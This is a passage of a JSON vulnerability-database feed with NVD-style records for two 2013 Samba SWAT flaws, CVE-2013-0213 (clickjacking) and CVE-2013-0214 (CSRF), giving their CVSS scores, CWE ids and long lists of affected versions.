"cpe:2.3:a:samba:samba:3.0.21:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:d:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.31:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:53", "description": "The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3.6.x before 3.6.12, and 4.x before 4.0.2 allows remote attackers to conduct clickjacking attacks via a (1) FRAME or (2) IFRAME element.\nPer: http://capec.mitre.org/data/definitions/103.html\r\n\r\n\"CAPEC-103: Clickjacking\"", "edition": 3, "cvss3": {}, "published": "2013-02-02T20:55:00", "title": "CVE-2013-0213", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0213"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:samba:samba:3.0.6", "cpe:/a:samba:samba:3.0.16", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:3.2.14", "cpe:/a:samba:samba:3.4.1", "cpe:/a:samba:samba:3.5.17", "cpe:/a:samba:samba:3.3.9", "cpe:/a:samba:samba:3.0.23", "cpe:/a:samba:samba:3.4.0", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.2.9", "cpe:/a:samba:samba:3.3.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.2.11", "cpe:/a:samba:samba:3.3.6", "cpe:/a:samba:samba:3.1.0", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:3.0.30", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:3.3.2", "cpe:/a:samba:samba:3.4.9", "cpe:/a:samba:samba:3.2.15", "cpe:/a:samba:samba:3.0.21c", "cpe:/a:samba:samba:3.0.11", "cpe:/a:samba:samba:3.4.16", "cpe:/a:samba:samba:3.4.12", "cpe:/a:samba:samba:3.0.21b", "cpe:/a:samba:samba:3.6.7", "cpe:/a:samba:samba:3.0.26a", "cpe:/a:samba:samba:3.4.14", "cpe:/a:samba:samba:3.0.23d", "cpe:/a:samba:samba:3.4.15", "cpe:/a:samba:samba:3.5.19", "cpe:/a:samba:samba:3.4.5", "cpe:/a:samba:samba:3.0.21", "cpe:/a:samba:samba:3.0.9", "cpe:/a:samba:samba:3.3.3", "cpe:/a:samba:samba:3.0.20b", "cpe:/a:samba:samba:3.2.10", "cpe:/a:samba:samba:3.5.15", "cpe:/a:samba:samba:3.2.8", "cpe:/a:samba:samba:3.2.5", "cpe:/a:samba:samba:3.0.35", "cpe:/a:samba:samba:3.0.10", "cpe:/a:samba:samba:3.4.8", "cpe:/a:samba:samba:3.4.13", "cpe:/a:samba:samba:3.3.4", "cpe:/a:samba:samba:3.3.1", "cpe:/a:samba:samba:3.3.16", "cpe:/a:samba:samba:3.0.37", "cpe:/a:samba:samba:3.0.15", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:3.2.13", "cpe:/a:samba:samba:3.0.24", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:3.4.10", "cpe:/a:samba:samba:3.0.25c", "cpe:/a:samba:samba:3.4.6", "cpe:/a:samba:samba:3.2.1", "cpe:/a:samba:samba:3.6.10", "cpe:/a:samba:samba:3.0.34", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.6.9", "cpe:/a:samba:samba:3.0.7", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:3.3.0", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.20", "cpe:/a:samba:samba:3.0.25a", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.22", "cpe:/a:samba:samba:3.6.11", "cpe:/a:samba:samba:3.3.5", "cpe:/a:samba:samba:3.0.23b", "cpe:/a:samba:samba:3.3.11", "cpe:/a:samba:samba:3.0.29", "cpe:/a:samba:samba:3.4.3", "cpe:/a:samba:samba:3.2.2", "cpe:/a:samba:samba:4.0.1", "cpe:/a:samba:samba:3.0.23a", "cpe:/a:samba:samba:3.0.4", "cpe:/a:samba:samba:3.2.0", "cpe:/a:samba:samba:3.5.14", "cpe:/a:samba:samba:3.4.4", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:3.3.15", "cpe:/a:samba:samba:3.0.5", "cpe:/a:samba:samba:3.2.4", "cpe:/a:samba:samba:3.3.14", "cpe:/a:samba:samba:3.5.20", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.6.8", "cpe:/a:samba:samba:3.0.26", "cpe:/a:samba:samba:3.4.17", "cpe:/a:samba:samba:3.6.6", "cpe:/a:samba:samba:3.0.14a", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:3.2.7", "cpe:/a:samba:samba:3.3.12", "cpe:/a:samba:samba:3.0.8", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.6.4", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.5.16", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:3.0.21a", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.14", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:3.2.6", "cpe:/a:samba:samba:3.0.19", "cpe:/a:samba:samba:3.0.2a", "cpe:/a:samba:samba:3.3.8", "cpe:/a:samba:samba:3.4.7", "cpe:/a:samba:samba:3.0.12", "cpe:/a:samba:samba:3.0.23c", "cpe:/a:samba:samba:3.0.27", "cpe:/a:samba:samba:3.0.25", "cpe:/a:samba:samba:3.0.36", "cpe:/a:samba:samba:3.4.11", "cpe:/a:samba:samba:3.0.33", "cpe:/a:samba:samba:3.0.18", "cpe:/a:samba:samba:4.0.0", "cpe:/a:samba:samba:3.0.13", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:3.6.5", "cpe:/a:samba:samba:3.0.20a", "cpe:/a:samba:samba:3.0.17", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:3.3.7", "cpe:/a:samba:samba:3.0.28", "cpe:/a:samba:samba:3.5.18", "cpe:/a:samba:samba:3.2.3", "cpe:/a:samba:samba:3.0.25b", "cpe:/a:samba:samba:3.0.32", "cpe:/a:samba:samba:3.2.12", "cpe:/a:samba:samba:3.3.10", "cpe:/a:samba:samba:3.4.2", "cpe:/a:samba:samba:3.0.31"], "id": "CVE-2013-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0213", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23d:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:d:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.31:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:53", "description": "Cross-site request forgery (CSRF) vulnerability in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3.6.x before 3.6.12, and 4.x before 4.0.2 allows remote attackers to hijack the authentication of arbitrary users by leveraging knowledge of a password and composing requests that perform SWAT actions.", "edition": 3, "cvss3": {}, "published": "2013-02-02T20:55:00", "title": "CVE-2013-0214", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0214"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:samba:samba:3.0.6", "cpe:/a:samba:samba:3.0.16", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:3.2.14", "cpe:/a:samba:samba:3.4.1", "cpe:/a:samba:samba:3.5.17", "cpe:/a:samba:samba:3.3.9", "cpe:/a:samba:samba:3.0.23", "cpe:/a:samba:samba:3.4.0", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.2.9", "cpe:/a:samba:samba:3.3.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.2.11", "cpe:/a:samba:samba:3.3.6", "cpe:/a:samba:samba:3.1.0", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:3.0.30", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:3.3.2", "cpe:/a:samba:samba:3.4.9", "cpe:/a:samba:samba:3.2.15", "cpe:/a:samba:samba:3.0.21c", "cpe:/a:samba:samba:3.0.11", "cpe:/a:samba:samba:3.4.16", "cpe:/a:samba:samba:3.4.12", "cpe:/a:samba:samba:3.0.21b", "cpe:/a:samba:samba:3.6.7", "cpe:/a:samba:samba:3.0.26a", "cpe:/a:samba:samba:3.4.14", "cpe:/a:samba:samba:3.0.23d", "cpe:/a:samba:samba:3.4.15", "cpe:/a:samba:samba:3.5.19", "cpe:/a:samba:samba:3.4.5", "cpe:/a:samba:samba:3.0.21", "cpe:/a:samba:samba:3.0.9", "cpe:/a:samba:samba:3.3.3", "cpe:/a:samba:samba:3.0.20b", "cpe:/a:samba:samba:3.2.10", "cpe:/a:samba:samba:3.5.15", "cpe:/a:samba:samba:3.2.8", "cpe:/a:samba:samba:3.2.5", "cpe:/a:samba:samba:3.0.35", "cpe:/a:samba:samba:3.0.10", "cpe:/a:samba:samba:3.4.8", "cpe:/a:samba:samba:3.4.13", "cpe:/a:samba:samba:3.3.4", "cpe:/a:samba:samba:3.3.1", "cpe:/a:samba:samba:3.3.16", "cpe:/a:samba:samba:3.0.37", "cpe:/a:samba:samba:3.0.15", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:3.2.13", "cpe:/a:samba:samba:3.0.24", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:3.4.10", "cpe:/a:samba:samba:3.0.25c", "cpe:/a:samba:samba:3.4.6", "cpe:/a:samba:samba:3.2.1", "cpe:/a:samba:samba:3.6.10", "cpe:/a:samba:samba:3.0.34", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.6.9", "cpe:/a:samba:samba:3.0.7", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:3.3.0", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.20", "cpe:/a:samba:samba:3.0.25a", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.22", "cpe:/a:samba:samba:3.6.11", "cpe:/a:samba:samba:3.3.5", "cpe:/a:samba:samba:3.0.23b", "cpe:/a:samba:samba:3.3.11", "cpe:/a:samba:samba:3.0.29", "cpe:/a:samba:samba:3.4.3", "cpe:/a:samba:samba:3.2.2", "cpe:/a:samba:samba:4.0.1", "cpe:/a:samba:samba:3.0.23a", "cpe:/a:samba:samba:3.0.4", "cpe:/a:samba:samba:3.2.0", "cpe:/a:samba:samba:3.5.14", "cpe:/a:samba:samba:3.4.4", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:3.3.15", "cpe:/a:samba:samba:3.0.5", "cpe:/a:samba:samba:3.2.4", "cpe:/a:samba:samba:3.3.14", "cpe:/a:samba:samba:3.5.20", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.6.8", "cpe:/a:samba:samba:3.0.26", "cpe:/a:samba:samba:3.4.17", "cpe:/a:samba:samba:3.6.6", "cpe:/a:samba:samba:3.0.14a", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:3.2.7", "cpe:/a:samba:samba:3.3.12", "cpe:/a:samba:samba:3.0.8", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.6.4", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.5.16", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:3.0.21a", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.14", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:3.2.6", "cpe:/a:samba:samba:3.0.19", "cpe:/a:samba:samba:3.0.2a", "cpe:/a:samba:samba:3.3.8", "cpe:/a:samba:samba:3.4.7", "cpe:/a:samba:samba:3.0.12", "cpe:/a:samba:samba:3.0.23c", "cpe:/a:samba:samba:3.0.27", "cpe:/a:samba:samba:3.0.25", "cpe:/a:samba:samba:3.0.36", "cpe:/a:samba:samba:3.4.11", "cpe:/a:samba:samba:3.0.33", "cpe:/a:samba:samba:3.0.18", "cpe:/a:samba:samba:4.0.0", "cpe:/a:samba:samba:3.0.13", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:3.6.5", "cpe:/a:samba:samba:3.0.20a", "cpe:/a:samba:samba:3.0.17", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:3.3.7", "cpe:/a:samba:samba:3.0.28", "cpe:/a:samba:samba:3.5.18", "cpe:/a:samba:samba:3.2.3", "cpe:/a:samba:samba:3.0.25b", "cpe:/a:samba:samba:3.0.32", "cpe:/a:samba:samba:3.2.12", "cpe:/a:samba:samba:3.3.10", "cpe:/a:samba:samba:3.4.2", "cpe:/a:samba:samba:3.0.31"], "id": "CVE-2013-0214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0214", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.2:*:*:*:*:*:*:*", 